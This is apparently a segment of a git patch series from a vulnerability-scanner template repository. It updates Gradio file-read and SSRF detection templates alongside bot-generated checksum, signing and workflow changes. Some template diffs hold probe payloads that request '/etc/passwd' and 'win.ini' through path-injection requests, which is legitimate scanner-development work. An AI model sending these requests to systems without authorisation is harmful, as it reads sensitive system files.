b/http/exposed-panels/turnkey-lamp-panel.yaml index 6400d34bc0..cc8f38a24d 100644 --- a/http/exposed-panels/turnkey-lamp-panel.yaml +++ b/http/exposed-panels/turnkey-lamp-panel.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4b0a004830460221008e88f309cb2b1e984efcb8d583f2474a3bb35485e4cb1ce1465533744bfc7f810221009649f52bc1dbea811b3eccf48f2df29d0d3e1e4c6bda50f7e0f405248148c0d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1aabe3e034c3eaa48de80c31e11d7cc3faf4df22 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 16:29:13 +0530 Subject: [PATCH 0257/1841] Update and rename CVE-2024-1561-3x-ssrf.yaml to gradio-ssrf.yaml --- .../gradio/gradio-ssrf.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/{cves/2024/CVE-2024-1561-3x-ssrf.yaml => vulnerabilities/gradio/gradio-ssrf.yaml} (98%) diff --git a/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml b/http/vulnerabilities/gradio/gradio-ssrf.yaml similarity index 98% rename from http/cves/2024/CVE-2024-1561-3x-ssrf.yaml rename to http/vulnerabilities/gradio/gradio-ssrf.yaml index c37d776ff8..659601202b 100644 --- a/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml +++ b/http/vulnerabilities/gradio/gradio-ssrf.yaml @@ -1,4 +1,4 @@ -id: CVE-2024-1561-3x-ssrf +id: gradio-ssrf info: name: Gradio 3.47 - 3.50.2 - Server-Side Request Forgery From 144c392e281443e41650760eeda0b6a2c99560a3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 16:36:32 +0530 Subject: [PATCH 0258/1841] Update and rename CVE-2024-1561-3x.yaml to gradio-lfi.yaml --- .../gradio/gradio-lfi.yaml} | 27 +++---------------- 1 file changed, 4 insertions(+), 23 deletions(-) rename http/{cves/2024/CVE-2024-1561-3x.yaml => vulnerabilities/gradio/gradio-lfi.yaml} (84%) diff --git a/http/cves/2024/CVE-2024-1561-3x.yaml b/http/vulnerabilities/gradio/gradio-lfi.yaml similarity index 84% rename from http/cves/2024/CVE-2024-1561-3x.yaml rename to http/vulnerabilities/gradio/gradio-lfi.yaml index 0c53c6fe60..7dc1240758 100644 --- a/http/cves/2024/CVE-2024-1561-3x.yaml +++ b/http/vulnerabilities/gradio/gradio-lfi.yaml @@ -1,4 +1,4 @@ -id: CVE-2024-1561-3x +id: gradio-lfi info: name: Gradio 3.47 – 3.50.2 - Local File Inclusion @@ -43,35 +43,16 @@ http: attack: clusterbomb payloads: - fuzz_component_id: - - 1 - - 2 - - 3 - - 4 - - 5 - - 6 - - 7 - - 8 - - 9 - - 10 - - 11 - - 12 - - 13 - - 14 - - 15 - - 16 - - 17 - - 18 - - 19 - - 20 + fuzz_component_id: helpers/wordlists/numbers.txt path: - - c:\\windows\\win.ini - /etc/passwd + - c:\\windows\\win.ini stop-at-first-match: true matchers-condition: and matchers: - type: regex + part: body_2 regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" From cda3f88a5144d8a6724d6a8fb8e9b20127ddc196 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 11:11:20 +0000 Subject: [PATCH 0259/1841] Auto Generated New Template Addition List [Sun Jun 16 11:11:20 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b7f4a95a22..279d3d1db5 100644 --- a/.new-additions +++ b/.new-additions @@ -17,4 +17,5 @@ http/exposed-panels/veeam-backup-manager-login.yaml http/exposed-panels/wildix-collaboration-panel.yaml http/misconfiguration/apache/apache-server-status-localhost.yaml http/technologies/nperf-server-detect.yaml +http/vulnerabilities/gradio/gradio-ssrf.yaml network/detection/mikrotik-ssh-detect.yaml From fc64705cda05ef65ab5249425ba8f48669f60071 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 11:11:25 +0000 Subject: [PATCH 0260/1841] Auto Generated Templates Checksum [Sun Jun 16 11:11:25 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dbd1113a13..9687e1f070 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3960,7 +3960,7 @@ http/exposed-panels/ibm/ibm-maximo-login.yaml:aaf8da0bfec6d4b716d5f5eeba93337e00 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9 http/exposed-panels/ibm/ibm-note-login.yaml:62703fcdd67848e4200d872fd71bf8b635caa239 http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23 -http/exposed-panels/ibm/ibm-security-access-manager.yaml:83faa8d7636cd912e030c69615cf5e6fa59e871c +http/exposed-panels/ibm/ibm-security-access-manager.yaml:d42d212268283dfd88cae9d7011326affca83204 http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4 http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06 http/exposed-panels/ibm/ibm-websphere-panel.yaml:63ec51d2ef895c41790d02a2e7c9e599ea72d438 @@ -4505,7 +4505,7 @@ http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:d2198b812f4062c0f360e http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943 http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060 -http/exposed-panels/turnkey-lamp-panel.yaml:2d6eb631d45313951c315cee4e5b60b3b928fdca +http/exposed-panels/turnkey-lamp-panel.yaml:8ec785a66d2050a19b465630ee89555e0d90798a http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996 @@ -7648,6 +7648,7 @@ http/vulnerabilities/gitlab/gitlab-rce.yaml:173dd50897b2956f85fce08f9730f740415e http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:969333f355e024ef605152fe26bb45511f20f4ad http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:8d551aa4f723d8e79ee57beb2f491c86f5b6cffc http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:83312ba18791464992c70dd4fe10965ba1ed2244 +http/vulnerabilities/gradio/gradio-ssrf.yaml:00b00562a0591097f7d304072f160002025ff5a9 http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 @@ -8649,7 +8650,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ed1f851e720de8a8450fbb782aec6a66deaa49d4 +templates-checksum.txt:c3f23d9257a998e95a82bb72446d194ba767c2fb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4cc66b170990a2346f2b817079323ecc4f965056 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 11:12:06 +0000 Subject: [PATCH 0261/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9e207fe078..d49d43f3e6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -22,6 +22,7 @@ on: - 'http/exposed-panels/wildix-collaboration-panel.yaml' - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' - 'http/technologies/nperf-server-detect.yaml' + - 'http/vulnerabilities/gradio/gradio-ssrf.yaml' - 'network/detection/mikrotik-ssh-detect.yaml' workflow_dispatch: jobs: From 4d76064a4bc152da3d8da7045e698a0b738b6487 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 11:12:10 +0000 Subject: [PATCH 0262/1841] Auto Generated New Template Addition List [Sun Jun 16 11:12:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 279d3d1db5..7100393234 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-43472.yaml +http/cves/2023/CVE-2023-51449.yaml http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml From 5567ff0e4fda34ae6c783d544c305f5069d8912c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 11:12:18 +0000 Subject: [PATCH 0263/1841] Auto Generated Templates Checksum [Sun Jun 16 11:12:18 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9687e1f070..98a4ac7109 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3217,6 +3217,7 @@ http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 +http/cves/2023/CVE-2023-51449.yaml:04c76de5d4ae42aa4eb7299becf27b87b3381e68 http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d @@ -8650,7 +8651,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c3f23d9257a998e95a82bb72446d194ba767c2fb +templates-checksum.txt:94c9b7525b3d10965089ff3e8751078a7969db33 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 01233950440dbc3354d4b42eaee1869ced1d588f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 11:12:56 +0000 Subject: [PATCH 0264/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d49d43f3e6..0667b7e87a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-43472.yaml' + - 'http/cves/2023/CVE-2023-51449.yaml' - 'http/cves/2023/CVE-2023-6505.yaml' - 'http/cves/2023/CVE-2023-6786.yaml' - 'http/cves/2024/CVE-2024-0250.yaml' From cc4d48f26a6645a0294860d9e9e386e906268032 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 11:13:13 +0000 Subject: [PATCH 0265/1841] Auto Template Signing [Sun Jun 16 11:13:13 UTC 2024] :robot: --- http/exposed-panels/ibm/ibm-note-login.yaml | 1 + http/exposed-panels/ibm/ibm-security-access-manager.yaml | 1 + http/vulnerabilities/gradio/gradio-ssrf.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/exposed-panels/ibm/ibm-note-login.yaml b/http/exposed-panels/ibm/ibm-note-login.yaml index a1e16643c0..151db4b6d9 100644 --- a/http/exposed-panels/ibm/ibm-note-login.yaml +++ b/http/exposed-panels/ibm/ibm-note-login.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a019cfe0aba9fc651490032a791ac8c3fc7f5b9ee782c44e122161c3698cc039022100c97e7c7c28a69a32b3a4fbc73ab34d5599f81a8c34d85e266347905e4da0df9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ibm/ibm-security-access-manager.yaml b/http/exposed-panels/ibm/ibm-security-access-manager.yaml index 93e10281b7..61037fdfdb 100644 --- a/http/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/http/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -43,3 +43,4 @@ http: - "/mga/sps/authsvc/policy/forgot_password" part: body condition: and +# digest: 4b0a00483046022100c816b86e40021cbe5ef080a1ebc36d14d60604fc4f2c7deb3f6094655b03ed26022100fa945950ba3d39b400e461e14e07ed6ed86b1b31fd9c7d2e2925cb752f4df0cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/gradio/gradio-ssrf.yaml b/http/vulnerabilities/gradio/gradio-ssrf.yaml index 659601202b..87c67f9d92 100644 --- a/http/vulnerabilities/gradio/gradio-ssrf.yaml +++ b/http/vulnerabilities/gradio/gradio-ssrf.yaml @@ -55,3 +55,4 @@ http: - type: status status: - 200 +# digest: 4b0a0048304602210084254e5be884aa98296a738a4c7318f5fc3144cd7a242e19dfc57c3e7540a125022100db240aae793f3c25c826a49fe256d4109590d1fd40a2ad08de4d75925b3985f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 531a676eaaab38129aab71d590b2ca0318b726f8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 16:53:22 +0530 Subject: [PATCH 0266/1841] Update CVE-2024-1728.yaml --- http/cves/2024/CVE-2024-1728.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-1728.yaml b/http/cves/2024/CVE-2024-1728.yaml index a75eb9bce3..31f74dce90 100644 --- a/http/cves/2024/CVE-2024-1728.yaml +++ b/http/cves/2024/CVE-2024-1728.yaml @@ -11,9 +11,9 @@ info: remediation: | Update to version 4.19.2. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-1728 - https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7 - https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a + - https://nvd.nist.gov/vuln/detail/CVE-2024-1728 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -22,6 +22,8 @@ info: epss-score: 0.00044 epss-percentile: 0.10164 metadata: + max-request: 5 + verified: true vendor: gradio product: gradio shodan-query: html:"__gradio_mode__" @@ -34,24 +36,23 @@ http: Host: {{Hostname}} Content-Type: application/json - {"data":[[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549, - "mime_type":"text/markdown"}]],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"} + {"data":[[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}]],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"} - | GET /queue/data?session_hash={{randstr}} HTTP/1.1 Host: {{Hostname}} - | - GET /file=§extracted_path§ HTTP/1.1 + GET /file={{extracted_path}} HTTP/1.1 Host: {{Hostname}} extractors: - type: regex - internal: true + name: extracted_path regex: - "/tmp/gradio/.*/passwd" - "C:.*\\win\\.ini" - name: extracted_path + internal: true payloads: path: From d4672990c24e86983e145512117868720c6616dd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 16:56:15 +0530 Subject: [PATCH 0267/1841] Update CVE-2021-43831.yaml --- http/cves/2021/CVE-2021-43831.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index d231cceb03..6499d743b8 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -1,7 +1,7 @@ id: CVE-2021-43831 info: - name: Arbitrary File Read in Gradio + name: Gradio < 2.5.0 - Arbitrary File Read author: isacaya severity: high description: | @@ -39,6 +39,7 @@ http: - /windows/win.ini stop-at-first-match: true + matchers-condition: and matchers: - type: regex From 0a8063a15d7034f158d299edf5988ac7e3f7aab2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 11:26:54 +0000 Subject: [PATCH 0268/1841] Auto Generated New Template Addition List [Sun Jun 16 11:26:53 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7100393234..d13eebfb3f 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2023/CVE-2023-51449.yaml http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml +http/cves/2024/CVE-2024-1728.yaml http/cves/2024/CVE-2024-23692.yaml http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-37393.yaml From 8a62831c2d418c61bd2109e8991b3b1b02a13e3b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 11:26:59 +0000 Subject: [PATCH 0269/1841] Auto Generated Templates Checksum [Sun Jun 16 11:26:59 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 98a4ac7109..25255051f0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -615,7 +615,7 @@ helpers/payloads/swagger-payload:6e0a08fc7310a1ce07226a012520ba1f73029945 helpers/payloads/wp-social-warfare-rce.txt:6b93ad84c3035c6779d75057e645171476cbc530 helpers/wordlists/adminer-paths.txt:2ac24141ad5f28203b9ca35719bd51f39381aa36 helpers/wordlists/grafana-plugins.txt:0621c38f856c64ac8c96e53b96bc90881fe35704 -helpers/wordlists/headers.txt:2effcf74fe0332b242c98df1f50f774c556746d6 +helpers/wordlists/headers.txt:1d92a664669f50906e4ad90d299f78cbeb6f8687 helpers/wordlists/mdb-paths.txt:c380943cfa8a337ccb1ea38062e2856924960f1a helpers/wordlists/mysql-passwords.txt:39cb7f9500b441097c09510fbf93b7c123cd77e9 helpers/wordlists/mysql-users.txt:d46fe9fd35f6b8d4de6901572e04bcc0845e8332 @@ -3274,6 +3274,7 @@ http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a +http/cves/2024/CVE-2024-1728.yaml:7cafeaf0ee890de1de7e0e2833d5f3a23f99aaa0 http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411 http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b @@ -3959,9 +3960,9 @@ http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a76 http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e http/exposed-panels/ibm/ibm-maximo-login.yaml:aaf8da0bfec6d4b716d5f5eeba93337e0064ab21 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9 -http/exposed-panels/ibm/ibm-note-login.yaml:62703fcdd67848e4200d872fd71bf8b635caa239 +http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23 -http/exposed-panels/ibm/ibm-security-access-manager.yaml:d42d212268283dfd88cae9d7011326affca83204 +http/exposed-panels/ibm/ibm-security-access-manager.yaml:0cd521ff1a0b1bd1fccc74d9b3a1b16c9805a5b8 http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4 http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06 http/exposed-panels/ibm/ibm-websphere-panel.yaml:63ec51d2ef895c41790d02a2e7c9e599ea72d438 @@ -7649,7 +7650,7 @@ http/vulnerabilities/gitlab/gitlab-rce.yaml:173dd50897b2956f85fce08f9730f740415e http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:969333f355e024ef605152fe26bb45511f20f4ad http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:8d551aa4f723d8e79ee57beb2f491c86f5b6cffc http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:83312ba18791464992c70dd4fe10965ba1ed2244 -http/vulnerabilities/gradio/gradio-ssrf.yaml:00b00562a0591097f7d304072f160002025ff5a9 +http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 @@ -8651,7 +8652,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:94c9b7525b3d10965089ff3e8751078a7969db33 +templates-checksum.txt:e1c172289b2c9095c0e10b61fdc8347d39fc72b7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 472341408eb38c318a7f61ffe6bcd0073c00b2e2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 11:27:49 +0000 Subject: [PATCH 0270/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0667b7e87a..862ea30229 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2023/CVE-2023-6505.yaml' - 'http/cves/2023/CVE-2023-6786.yaml' - 'http/cves/2024/CVE-2024-0250.yaml' + - 'http/cves/2024/CVE-2024-1728.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' From 6e19e8bd2b61f834ea1dc3c0d95b852572e514c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 11:28:42 +0000 Subject: [PATCH 0271/1841] Auto Template Signing [Sun Jun 16 11:28:42 UTC 2024] :robot: --- http/cves/2023/CVE-2023-51449.yaml | 1 + http/cves/2024/CVE-2024-1728.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-51449.yaml b/http/cves/2023/CVE-2023-51449.yaml index bb20130a91..1423dcf9ff 100644 --- a/http/cves/2023/CVE-2023-51449.yaml +++ b/http/cves/2023/CVE-2023-51449.yaml @@ -81,3 +81,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402202afd5a76a8709b9e353a87ab56a8aef3d1afa2739156058f4a7cd46c851390400220687bf99017b86a6013b449d53d1c9b790e8e7b4ba7aec6fe2292b87a11d4527c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1728.yaml b/http/cves/2024/CVE-2024-1728.yaml index 31f74dce90..768b54323c 100644 --- a/http/cves/2024/CVE-2024-1728.yaml +++ b/http/cves/2024/CVE-2024-1728.yaml @@ -71,3 +71,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502200f825f20fad4b54e4c1edb052482ff3d57c02b63e05a9cf6227b37d39ebee112022100b36cc92a5b2685c8da867167fa0fdc31e99e6d9d6a461ff14467d518c3904dc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0d6a44c3cb8e3e062de310b82e5138eec5685aed Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 16:59:19 +0530 Subject: [PATCH 0272/1841] lint fix --- http/cves/2021/CVE-2021-43831.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index 6499d743b8..41bdceadc2 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -1,7 +1,7 @@ id: CVE-2021-43831 info: - name: Gradio < 2.5.0 - Arbitrary File Read + name: Gradio < 2.5.0 - Arbitrary File Read author: isacaya severity: high description: | From 987f814d73f9c267654dee3975b28ed644e26ffa Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 11:33:00 +0000 Subject: [PATCH 0273/1841] Auto Generated New Template Addition List [Sun Jun 16 11:33:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d13eebfb3f..6ddcfff2fe 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ cloud/aws/sns/sns-public-subscribe-access.yaml dast/vulnerabilities/sqli/time-based-sqli.yaml http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml +http/cves/2021/CVE-2021-43831.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-43472.yaml http/cves/2023/CVE-2023-51449.yaml From 37681bf242d2a8cf05d150e8c4595311d2ed2081 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 11:33:04 +0000 Subject: [PATCH 0274/1841] Auto Generated Templates Checksum [Sun Jun 16 11:33:04 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 25255051f0..f269c77a5d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2366,6 +2366,7 @@ http/cves/2021/CVE-2021-43734.yaml:ba2e81ae59684a8bcfde140cc091cb3a77e3f427 http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9 http/cves/2021/CVE-2021-43798.yaml:6afb9139e24bf0c40b9e5a0c12e49f83793920c2 http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f +http/cves/2021/CVE-2021-43831.yaml:4d7711b2a10764400dc49140a119261251d4a223 http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732 http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e @@ -3217,7 +3218,7 @@ http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f 